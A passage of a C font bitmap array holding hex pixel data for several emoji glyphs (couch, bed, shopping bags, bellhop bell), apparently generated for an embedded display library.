0xff, 0xff, 0xff, 0xf9, 0xfb, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xfc, 0xfc, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xfc, 0x7e, 0x0, 0x1f, 0xff,
0xff, 0xff, 0xff, 0xfe, 0x3f, 0x0, 0xf, 0xff,
0xff, 0xff, 0xff, 0xff, 0x9f, 0x9e, 0x67, 0xff,
0xff, 0xff, 0xff, 0xff, 0xc7, 0x9f, 0x33, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf0, 0x1f, 0x99, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x1f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3f, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xff, 0xf9, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf3, 0xff, 0xf9, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfc, 0xff, 0xfc, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfe, 0x7f, 0xfe, 0x7f, 0xff, 0xf0, 0x7,
0xff, 0xff, 0x3f, 0xff, 0x3f, 0xff, 0xf0, 0x1,
0xff, 0xff, 0x9f, 0xff, 0x9f, 0xff, 0xf9, 0xfe,
0xff, 0xff, 0xcf, 0xff, 0xcf, 0xff, 0xfc, 0xff,
0x7f, 0xff, 0xe7, 0xff, 0xe7, 0xff, 0xfe, 0x7f,
0xbf, 0xff, 0xf3, 0xff, 0xf3, 0xf0, 0x38, 0x0,
0x1, 0xc1, 0xf9, 0xff, 0xf9, 0xf0, 0x1c, 0x0,
0x0, 0xe0, 0x7c, 0xff, 0xfc, 0xf8, 0xe, 0x0,
0x0, 0x70, 0x3e, 0x7f, 0xfe, 0x7c, 0x7, 0x0,
0x0, 0x38, 0x1f, 0x3f, 0xff, 0x3e, 0x3, 0x80,
0x0, 0x1c, 0xf, 0x9f, 0xff, 0x9f, 0x1, 0xc0,
0x0, 0xe, 0x7, 0xcf, 0xff, 0xcf, 0x80, 0xe0,
0x0, 0x7, 0x3, 0xe7, 0xff, 0xe7, 0xc0, 0x70,
0x0, 0x3, 0x81, 0xf3, 0xff, 0xf3, 0xe0, 0x38,
0x0, 0x1, 0xc0, 0xf9, 0xff, 0xf9, 0xf0, 0x1c,
0x0, 0x0, 0xe0, 0x7c, 0xff, 0xfc, 0xf8, 0xe,
0x0, 0x0, 0x70, 0x3e, 0x7f, 0xfe, 0x7c, 0x7,
0x0, 0x0, 0x38, 0x1f, 0x3f, 0xff, 0x3e, 0x3,
0x80, 0x0, 0x1c, 0xf, 0x9f, 0xff, 0x9f, 0x1,
0xc0, 0x0, 0xe, 0x7, 0xcf, 0xff, 0xcf, 0x80,
0xe0, 0x0, 0x7, 0x3, 0xe7, 0xff, 0xe7, 0xc0,
0x70, 0x0, 0x3, 0x81, 0xf3, 0xff, 0xf3, 0xe0,
0x38, 0x0, 0x1, 0xc0, 0xf9, 0xff, 0xf9, 0xf0,
0x1c, 0x0, 0x0, 0xe0, 0x7c, 0xff, 0xfc, 0xf8,
0xe, 0x0, 0x0, 0x70, 0x3e, 0x7f, 0xfe, 0x7c,
0x7, 0x0, 0x0, 0x38, 0x1f, 0x3f, 0xff, 0x3e,
0x3, 0x80, 0x0, 0x1c, 0xf, 0x9f, 0xff, 0x9f,
0x81, 0xc0, 0x0, 0xe, 0xf, 0xcf, 0xff, 0xcf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xe7, 0xff, 0xe7,
0xff, 0xff, 0xff, 0xff, 0xff, 0xf3, 0xff, 0xf3,
0xff, 0xff, 0xff, 0xff, 0xff, 0xf9, 0xff, 0xfc,
0xff, 0xff, 0xff, 0xff, 0xff, 0xf9, 0xff, 0xfe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xff,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfd,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0,
/* U+1F6CB "🛋" */
0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xff, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xe0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x0,
0x30, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x60,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0x0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x38, 0x0, 0x30, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x1, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0xc, 0x0, 0xc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0xff, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3e, 0xc, 0x3c, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x60, 0x60, 0x0,
0x0, 0x0, 0x0, 0x0, 0x6, 0x3, 0x3, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x18, 0x78,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x30, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x60, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x18, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xc0, 0x0, 0x0, 0x0,
0x0, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0,
0x0, 0x0, 0xe0, 0x0, 0x1c, 0x0, 0x3, 0x80,
0x0, 0x0, 0xe, 0x0, 0x0, 0xe0, 0x0, 0xc,
0x0, 0x0, 0x0, 0x70, 0x0, 0x7, 0x0, 0x0,
0x60, 0x0, 0x0, 0x3, 0x80, 0x0, 0x38, 0x0,
0x3, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x1, 0xc0,
0x0, 0x18, 0x0, 0x0, 0x0, 0xe0, 0x0, 0xe,
0x0, 0x0, 0xc0, 0x0, 0x0, 0x7, 0x0, 0x0,
0x70, 0x0, 0x6, 0x0, 0x0, 0x0, 0x38, 0x0,
0x3, 0x80, 0x0, 0x30, 0x0, 0x0, 0x1, 0xc0,
0x0, 0x1c, 0x0, 0x1, 0x80, 0x0, 0x3f, 0xfe,
0x0, 0x0, 0xe0, 0x0, 0xf, 0xff, 0x87, 0xff,
0xf0, 0x0, 0x7, 0x0, 0x0, 0x7f, 0xff, 0x79,
0xe3, 0x80, 0x0, 0x38, 0x0, 0x3, 0xf, 0x3f,
0x87, 0x1c, 0x0, 0x1, 0xc0, 0x0, 0x18, 0x70,
0xfc, 0x38, 0xe0, 0x0, 0xe, 0x0, 0x0, 0xc3,
0x87, 0xe1, 0xc7, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x1c, 0x3f, 0xe, 0x7f, 0xff, 0xff, 0xff, 0xff,
0xf8, 0xe1, 0xf8, 0x73, 0x80, 0x0, 0x1c, 0x0,
0x0, 0xe7, 0xf, 0xc3, 0xb8, 0x0, 0x0, 0xe0,
0x0, 0x3, 0xb8, 0x7e, 0x1f, 0x80, 0x0, 0x7,
0x0, 0x0, 0xf, 0xc3, 0xf0, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xfe, 0x1f, 0x87, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf0, 0xfc, 0x38, 0x0,
0x0, 0xe, 0x0, 0x0, 0x3, 0x87, 0xe1, 0xc0,
0x0, 0x0, 0x70, 0x0, 0x0, 0x1c, 0x3f, 0xe,
0x0, 0x0, 0x3, 0x80, 0x0, 0x0, 0xe1, 0xf8,
0x70, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x7, 0xf,
0xc3, 0x80, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x38,
0x7e, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xc3, 0xf0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfe, 0x1f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7b, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0x8f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf0, 0x0, 0x3f, 0x80,
0x0, 0x0, 0x0, 0x3f, 0x80, 0x0, 0x1, 0xfc,
0x0, 0x0, 0x0, 0x1, 0xfc, 0x0, 0x0, 0xf,
0xe0, 0x0, 0x0, 0x0, 0xf, 0xe0, 0x0, 0x0,
0x7f, 0x0, 0x0, 0x0, 0x0, 0x7f, 0x0, 0x0,
0x3, 0xf8, 0x0, 0x0, 0x0, 0x3, 0xf8, 0x0,
/* U+1F6CC "🛌" */
0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xff, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe0, 0xfe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0xcf, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe0, 0xc3, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0xc0, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0xc0,
0x30, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0,
0xc0, 0x30, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe0, 0xc0, 0x30, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xc0, 0x30, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe0, 0xc0, 0x33, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0xc0, 0x37, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe0, 0xc0, 0x3f, 0xfc,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0xc3, 0xff,
0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0xcf,
0xff, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0,
0xfe, 0xf, 0xff, 0xff, 0xf0, 0x0, 0x0, 0x0,
0xe0, 0xf8, 0x7, 0xff, 0xff, 0xff, 0x80, 0x0,
0x0, 0xe0, 0xe0, 0x1, 0xff, 0x7, 0x1f, 0xfc,
0x0, 0x0, 0xe0, 0xc0, 0x0, 0xfc, 0xf, 0x0,
0xff, 0xff, 0x0, 0xe0, 0xe0, 0x0, 0x78, 0x1e,
0x0, 0x7, 0xff, 0xc0, 0xe0, 0xf8, 0x0, 0x70,
0x1c, 0x0, 0x0, 0x1, 0xf0, 0xe0, 0xfe, 0x0,
0xe0, 0x38, 0x0, 0x0, 0x0, 0x78, 0xe0, 0xff,
0xff, 0xc0, 0x38, 0x0, 0x0, 0x0, 0x3c, 0xe0,
0xff, 0xff, 0x80, 0x70, 0x0, 0x0, 0x0, 0x1c,
0xe0, 0xc0, 0x3, 0x80, 0x70, 0x0, 0x0, 0x0,
0xe, 0xe0, 0xc0, 0x3, 0x80, 0xe0, 0x0, 0x0,
0x0, 0xe, 0xe0, 0xc0, 0x3, 0x0, 0xe0, 0x0,
0x0, 0x0, 0xe, 0xe0, 0xc0, 0x3, 0x0, 0xc0,
0x0, 0x0, 0x0, 0xf, 0xe0, 0xc0, 0x7, 0x1,
0xc0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0xc0, 0x7,
0x1, 0x80, 0x0, 0x0, 0x0, 0x7, 0xe0, 0xc0,
0x6, 0x1, 0x80, 0x0, 0x0, 0x0, 0x7, 0xe0,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xe0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x87, 0xe0,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x87,
0xe0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf,
0x87, 0xe0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf, 0x87, 0xe0, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x87, 0xe0, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x87, 0xe0, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0x87, 0xe0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0xe0, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0xff,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xff,
/* U+1F6CD "🛍" */
0x0, 0x0, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x78, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc1, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe, 0xf, 0x9e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x30, 0x37, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0xc1, 0xcc, 0x70, 0x0, 0x0, 0x0, 0x0, 0x3,
0x6, 0x38, 0xe0, 0x0, 0x0, 0x0, 0x0, 0xc,
0x18, 0xe3, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x30,
0x67, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xff, 0xff, 0xf8, 0x0, 0x0, 0x1, 0xff, 0xff,
0xff, 0xff, 0xfe, 0x0, 0x0, 0x1f, 0xff, 0xff,
0xff, 0xff, 0xf8, 0x0, 0x0, 0x7f, 0xff, 0xff,
0xff, 0xff, 0xe0, 0x0, 0x1, 0x87, 0xff, 0xff,
0xff, 0x1, 0x80, 0x0, 0x6, 0x1f, 0xff, 0xfc,
0x0, 0x6, 0x0, 0x0, 0x18, 0x67, 0xe0, 0x0,
0x0, 0x18, 0x0, 0x0, 0x61, 0x86, 0x0, 0x0,
0x6, 0x60, 0x0, 0x1, 0x86, 0x18, 0x0, 0x0,
0xff, 0x80, 0x0, 0x6, 0x18, 0x60, 0x0, 0x7,
0xff, 0x80, 0x0, 0x18, 0x61, 0x80, 0x0, 0x1c,
0x3f, 0x80, 0x0, 0x61, 0x86, 0x0, 0x0, 0x61,
0xff, 0x0, 0x1, 0x86, 0x18, 0x0, 0x3, 0x8f,
0xdc, 0x0, 0x6, 0x18, 0x60, 0x0, 0xe, 0x33,
0x38, 0x0, 0x18, 0x61, 0x80, 0x0, 0x38, 0xcc,
0x68, 0x0, 0x61, 0x86, 0x0, 0x0, 0xe3, 0x7f,
0xfe, 0x1, 0x86, 0x18, 0x0, 0x1, 0xff, 0xff,
0xff, 0x6, 0x18, 0x60, 0x3, 0xff, 0xff, 0xff,
0xfc, 0x18, 0x61, 0x80, 0xf, 0xff, 0xff, 0xff,
0xf0, 0x61, 0x86, 0x0, 0x31, 0xff, 0xff, 0xe0,
0xc1, 0x86, 0x18, 0x0, 0xc7, 0xff, 0xc0, 0x3,
0x6, 0x18, 0x60, 0x3, 0x19, 0xc0, 0x0, 0xc,
0x18, 0x61, 0x80, 0xc, 0x63, 0x0, 0x0, 0x30,
0x61, 0x86, 0x0, 0x31, 0x8c, 0x0, 0x0, 0xc1,
0x86, 0x18, 0x0, 0xc6, 0x30, 0x0, 0x3, 0x6,
0x18, 0x60, 0x3, 0x18, 0xc0, 0x0, 0xc, 0x18,
0x61, 0x80, 0xc, 0x63, 0x0, 0x0, 0x30, 0x61,
0x86, 0x0, 0x31, 0x8c, 0x0, 0x0, 0xc1, 0x86,
0x18, 0x0, 0xc6, 0x30, 0x0, 0x3, 0x6, 0x18,
0x60, 0x3, 0x18, 0xc0, 0x0, 0xc, 0x18, 0x61,
0x80, 0xc, 0x63, 0x0, 0x0, 0x30, 0x61, 0x86,
0x0, 0x31, 0x8c, 0x0, 0x0, 0xc1, 0x86, 0x18,
0x0, 0xc6, 0x30, 0x0, 0x3, 0xe, 0x18, 0x60,
0x3, 0x18, 0xc0, 0x0, 0xc, 0x30, 0xe1, 0x80,
0xc, 0x63, 0x0, 0x0, 0x30, 0xc7, 0xc6, 0x0,
0x31, 0x8c, 0x0, 0x0, 0xc3, 0x1b, 0x18, 0x0,
0xc6, 0x30, 0x0, 0x3, 0xc, 0xec, 0x60, 0x3,
0x18, 0xc0, 0x0, 0xc, 0x37, 0x39, 0x80, 0xc,
0x63, 0x0, 0x0, 0x31, 0xd8, 0x66, 0x0, 0x31,
0x8c, 0x0, 0x0, 0xc7, 0xc1, 0xd8, 0x0, 0xc6,
0x30, 0x0, 0x3, 0x9f, 0x3, 0x60, 0x3, 0x38,
0xc0, 0x0, 0x6, 0x78, 0xd, 0x80, 0x19, 0xe3,
0x0, 0x0, 0x19, 0xc0, 0x3e, 0x0, 0x67, 0xcc,
0x0, 0x0, 0x6f, 0xc0, 0x78, 0x1, 0xbb, 0x30,
0x0, 0x1, 0x8f, 0xc1, 0xe0, 0x7, 0xce, 0xc0,
0x0, 0x6, 0xf, 0xc3, 0x80, 0x1e, 0x1b, 0x0,
0x0, 0x1c, 0xf, 0xee, 0x3f, 0xf8, 0x6c, 0x0,
0x0, 0x70, 0x7, 0xff, 0xff, 0xc1, 0xf0, 0x0,
0x0, 0xc0, 0x7, 0xff, 0x8f, 0x83, 0xc0, 0x0,
0x1f, 0x0, 0x3, 0x0, 0xf, 0xcf, 0x0, 0x3f,
0xfc, 0x0, 0x0, 0x0, 0xf, 0xfc, 0x3f, 0xff,
0x80, 0x0, 0x0, 0x0, 0x7, 0xff, 0xff, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x2, 0x0, 0x0, 0x0,
/* U+1F6CE "🛎" */
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7f, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1e, 0xf, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x30, 0x1, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x0, 0xc,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0x1f,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xff,
0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf,
0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xff, 0xff, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xe0, 0x7f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xc0, 0x0, 0x3f, 0x0, 0x0,
0x0, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x7c, 0x0,
0x0, 0x0, 0x0, 0x78, 0x0, 0x0, 0x1, 0xe0,
0x0, 0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x3, 0xc0, 0x0, 0x0, 0x0,
0x3c, 0x0, 0x0, 0x0, 0x78, 0x10, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0xf, 0x7, 0x80, 0x0,
0x0, 0xe, 0x0, 0x0, 0x0, 0xe0, 0xf0, 0x0,
0x0, 0x0, 0x70, 0x0, 0x0, 0x1c, 0x1e, 0x0,
0x0, 0x0, 0x3, 0x80, 0x0, 0x1, 0xc3, 0xc0,
0x0, 0x0, 0x0, 0x38, 0x0, 0x0, 0x38, 0x38,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x3, 0x7,
0x0, 0x0, 0x0, 0x0, 0xc, 0x0, 0x0, 0x70,
0x70, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0, 0x7,
0xe, 0x0, 0x0, 0x0, 0x0, 0xe, 0x0, 0x0,
0x60, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x60, 0x0,
0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x0,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1, 0xfe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x78, 0x0, 0x3f, 0xff, 0xc0, 0x0, 0x0,
0x0, 0x3, 0xc0, 0x7, 0x87, 0xff, 0xff, 0xc0,
0x0, 0x0, 0x1e, 0x0, 0x70, 0x0, 0xff, 0xfc,
0x0, 0x0, 0x0, 0xe0, 0x7, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xc0, 0x1, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x7f, 0xf0,
0x0, 0x0, 0x0, 0x0, 0xff, 0xe0, 0xf, 0xff,
0xfe, 0x0, 0x0, 0xf, 0xff, 0xff, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc7,
0x8f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x1e,
0x70, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80,
0xe7, 0x0, 0x7, 0xff, 0xff, 0xff, 0xfe, 0x0,
0xe, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x6e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf3, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xfc, 0x7, 0xfe, 0x0,
0x0, 0x0, 0x0, 0x7, 0xff, 0x0, 0xf, 0xff,
0xe0, 0x0, 0x0, 0x7f, 0xfe, 0x0, 0x0, 0x3,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x3f, 0xff, 0xff, 0x80, 0x0, 0x0,
/* U+1F6CF "🛏" */
0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xff, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xff, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe1, 0xcf, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe1, 0xc3, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe1, 0xc0, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe1, 0xc0,
0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe1,
0xc0, 0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe1, 0xc0, 0x38, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe1, 0xc0, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x38, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe1, 0xc0, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe1, 0xc0, 0x7c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe1, 0xc7, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe1, 0xcf,
0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe1,
0xfe, 0x1, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe1, 0xf8, 0x0, 0x78, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe1, 0xe0, 0x0, 0x3f, 0xff, 0xff, 0xff,
0xff, 0x0, 0xe1, 0xc0, 0x0, 0x3f, 0xff, 0xff,
0xff, 0xff, 0xc0, 0xe1, 0xe0, 0x0, 0x7c, 0x3e,
0x0, 0x0, 0x1, 0xe0, 0xe1, 0xf0, 0x0, 0x70,
0x78, 0x0, 0x0, 0x0, 0x70, 0xe1, 0xfe, 0x0,
0xe0, 0xf0, 0x0, 0x0, 0x0, 0x38, 0xe1, 0xff,
0xff, 0xc0, 0xe0, 0x0, 0x0, 0x0, 0x1c, 0xe1,
0xff, 0xff, 0x81, 0xc0, 0x0, 0x0, 0x0, 0x1c,
0xe1, 0xc0, 0x3, 0x81, 0xc0, 0x0, 0x0, 0x0,
0xe, 0xe1, 0xc0, 0x3, 0x81, 0xc0, 0x0, 0x0,
0x0, 0xe, 0xe1, 0xc0, 0x3, 0x3, 0x80, 0x0,
0x0, 0x0, 0xe, 0xe1, 0xc0, 0x3, 0x3, 0x80,
0x0, 0x0, 0x0, 0xf, 0xe1, 0xc0, 0x3, 0x3,
0x80, 0x0, 0x0, 0x0, 0x7, 0xe1, 0xc0, 0x3,
0x3, 0x80, 0x0, 0x0, 0x0, 0x7, 0xe1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe1,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x87, 0xe1,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x87,
0xe1, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf,
